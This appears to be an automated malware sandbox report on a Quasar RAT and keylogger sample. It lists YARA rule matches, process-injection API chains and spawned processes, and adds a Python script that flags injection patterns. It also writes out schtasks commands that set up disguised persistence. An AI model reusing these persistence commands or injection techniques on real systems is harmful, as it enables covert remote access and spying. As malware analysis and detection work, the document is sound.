Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: dropped/windef.exe, type: DROPPED Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: dropped/windef.exe, type: DROPPED Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Contains functionality to shutdown / reboot the system
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7B11C GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,GetLastError,CloseHandle,GetKeyState,ExitWindowsEx, 5_2_00C7B11C
Found potential string decryption / allocating functions
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: String function: 00A68900 appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00DD37CB appears 38 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00DD8900 appears 49 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 00DE1940 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: String function: 004034E4 appears 33 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB318A NtWow64QueryInformationProcess64,GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_00AB318A
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB2591 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose, 4_2_00AB2591
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB27FB NtUnmapViewOfSection,RtlNtStatusToDosError, 4_2_00AB27FB
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB27C1 NtMapViewOfSection,RtlNtStatusToDosError, 4_2_00AB27C1
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB31D4 NtWow64ReadVirtualMemory64,GetModuleHandleW,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_00AB31D4
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB3509 GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,LocalFree,LocalFree, 4_2_00AB3509
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB2ED8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError, 4_2_00AB2ED8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB2B39 memset,ZwQueryInformationProcess,ReadProcessMemory, 4_2_00AB2B39
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB126D NtQueryVirtualMemory, 4_2_00AB126D
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C64CC8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError, 5_2_00C64CC8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C64854 memset,ZwQueryInformationProcess,ReadProcessMemory, 5_2_00C64854
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C63450 memset,NtCreateSection,memset,RtlNtStatusToDosError,ZwClose, 5_2_00C63450
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C6502C ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,StrRChrA, 5_2_00C6502C
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C82AC8 GetSystemTimes,NtQuerySystemInformation, 5_2_00C82AC8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C636F8 NtUnmapViewOfSection,RtlNtStatusToDosError, 5_2_00C636F8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C6528C NtResumeProcess,RtlNtStatusToDosError, 5_2_00C6528C
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C652A4 NtSuspendProcess,RtlNtStatusToDosError, 5_2_00C652A4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C636A8 NtMapViewOfSection,RtlNtStatusToDosError, 5_2_00C636A8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C82E70 InitializeCriticalSection,GetModuleHandleW,GetProcAddress,GetSystemTimes,NtQuerySystemInformation,HeapAlloc,GetTickCount, 5_2_00C82E70
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C64634 memset,ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory, 5_2_00C64634
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C83FCC ZwQueryKey,ZwQueryKey,memcpy, 5_2_00C83FCC
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C803EC GetProcessId,lstrlenW,HeapAlloc,HeapFree,HeapAlloc,NtQuerySystemInformation,GetCurrentProcess,DuplicateHandle,NtQueryObject,HeapFree,HeapAlloc,HeapFree,HeapAlloc,NtQueryObject,RtlInitUnicodeString,RtlEqualUnicodeString,NtQueryInformationFile,NtQueryInformationFile,_wcsnicmp,HeapAlloc,CloseHandle,HeapFree,HeapFree,HeapFree, 5_2_00C803EC
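The entries above list, per disassembled function, the APIs it calls in call order. Two chains stand out: 4_2_00AB2ED8 and 5_2_00C64CC8 (VirtualAllocEx, NtGetContextThread, WriteProcessMemory, NtSetContextThread, ResumeThread) are the classic thread-context hijack behind the "Modifies the context of a thread in another process" signature, and the NtCreateSection / NtMapViewOfSection / NtUnmapViewOfSection functions are the primitives behind "Maps a DLL or memory area into another process". The Python below is an added triage helper, not Joe Sandbox code: it parses lines in this report's format and flags those chains. The embedded sample lines are copied from this report; the Nt/Zw prefix normalization relies on the two names being aliased exports in ntdll, and the chain definitions are the author's own choice of what to look for.

```python
"""Flag process-injection API chains in Joe Sandbox 'Code function' lines.

Added triage helper for this report (not Joe Sandbox code). Each line lists the
APIs a disassembled function calls, in call order, which is enough to spot the
well-known chains without running the sample.
"""
import re
from collections import defaultdict

# Constructed input: a subset of this report's own 'Code function' lines.
REPORT_LINES = [
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\vnc.exe Code function: 4_2_00AB2591 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose, 4_2_00AB2591",
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\vnc.exe Code function: 4_2_00AB27C1 NtMapViewOfSection,RtlNtStatusToDosError, 4_2_00AB27C1",
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\vnc.exe Code function: 4_2_00AB2ED8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError, 4_2_00AB2ED8",
    "Source: C:\\Windows\\System32\\svchost.exe Code function: 5_2_00C64CC8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError, 5_2_00C64CC8",
    "Source: C:\\Windows\\System32\\svchost.exe Code function: 5_2_00C63450 memset,NtCreateSection,memset,RtlNtStatusToDosError,ZwClose, 5_2_00C63450",
    "Source: C:\\Windows\\System32\\svchost.exe Code function: 5_2_00C636A8 NtMapViewOfSection,RtlNtStatusToDosError, 5_2_00C636A8",
    "Source: C:\\Users\\user\\Desktop\\CVbJSUXraQ.exe Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress, 1_2_00DB4B37",
    "Source: C:\\Users\\user\\Desktop\\CVbJSUXraQ.exe Code function: String function: 00DD37CB appears 38 times",
]

FN_ID = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")

# Ordered chain: allocate in the target, write the payload, redirect a thread, resume it.
THREAD_HIJACK = ("VirtualAllocEx", "WriteProcessMemory", "SetContextThread", "ResumeThread")
# Unordered set: the primitives used to map a section into another process.
SECTION_MAP = {"CreateSection", "MapViewOfSection"}


def normalize(api):
    """Treat Nt*/Zw* as the same syscall stub (they are aliased exports in ntdll)."""
    if len(api) > 2 and api[:2] in ("Nt", "Zw") and api[2].isupper():
        return api[2:]
    return api


def parse_code_function(line):
    """Return (image, function_id, [apis]) or None for lines in another format."""
    image, sep, rest = line.partition(" Code function: ")
    parts = rest.split()
    if not sep or len(parts) < 3 or not FN_ID.match(parts[0]):
        return None
    image = image[len("Source: "):] if image.startswith("Source: ") else image
    apis = [normalize(a) for a in parts[1].split(",") if a]
    return image, parts[0], apis


def contains_in_order(seq, pattern):
    """True if every element of pattern occurs in seq, in that order (gaps allowed)."""
    it = iter(seq)
    return all(any(x == want for x in it) for want in pattern)


def classify(lines):
    """Map image path -> sorted list of injection findings."""
    apis_per_image = defaultdict(set)
    findings = defaultdict(set)
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue
        image, fn_id, apis = parsed
        apis_per_image[image].update(apis)
        if contains_in_order(apis, THREAD_HIJACK):
            findings[image].add("thread-context hijack in " + fn_id)
    for image, apis in apis_per_image.items():
        if SECTION_MAP <= apis:
            # Also used legitimately; confirm the process handle is remote before calling it injection.
            findings[image].add("section create+map primitives")
    return {image: sorted(f) for image, f in findings.items()}


if __name__ == "__main__":
    for image, hits in classify(REPORT_LINES).items():
        print(image, "->", "; ".join(hits))
```

The ordered match matters for the hijack chain: a function that merely imports WriteProcessMemory and ResumeThread is common in debuggers and installers, while allocate-write-set-context-resume in that order inside one function is rarely anything but injection. The section-mapping set is kept unordered because the create and map calls live in separate helper functions here (4_2_00AB2591 and 4_2_00AB27C1).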
PE file contains executable resources (Code or Archives)
Source: CVbJSUXraQ.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: CVbJSUXraQ.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Sample file is different than original file name gathered from version info
Source: CVbJSUXraQ.exe, 00000001.00000003.691617419.0000000001805000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAME vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamej vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\btpanui Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@33/5@3/3
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: winsock.exe.6.dr, u1802???????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winsock.exe.6.dr, u1802???????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E1A06A GetLastError,FormatMessageW, 1_2_00E1A06A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 1_2_00DB4E89
Source: CVbJSUXraQ.exe Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File read: C:\Users\user\Desktop\CVbJSUXraQ.exe Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe 'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\windef.exe C:\Users\user\AppData\Local\Temp\windef.exe
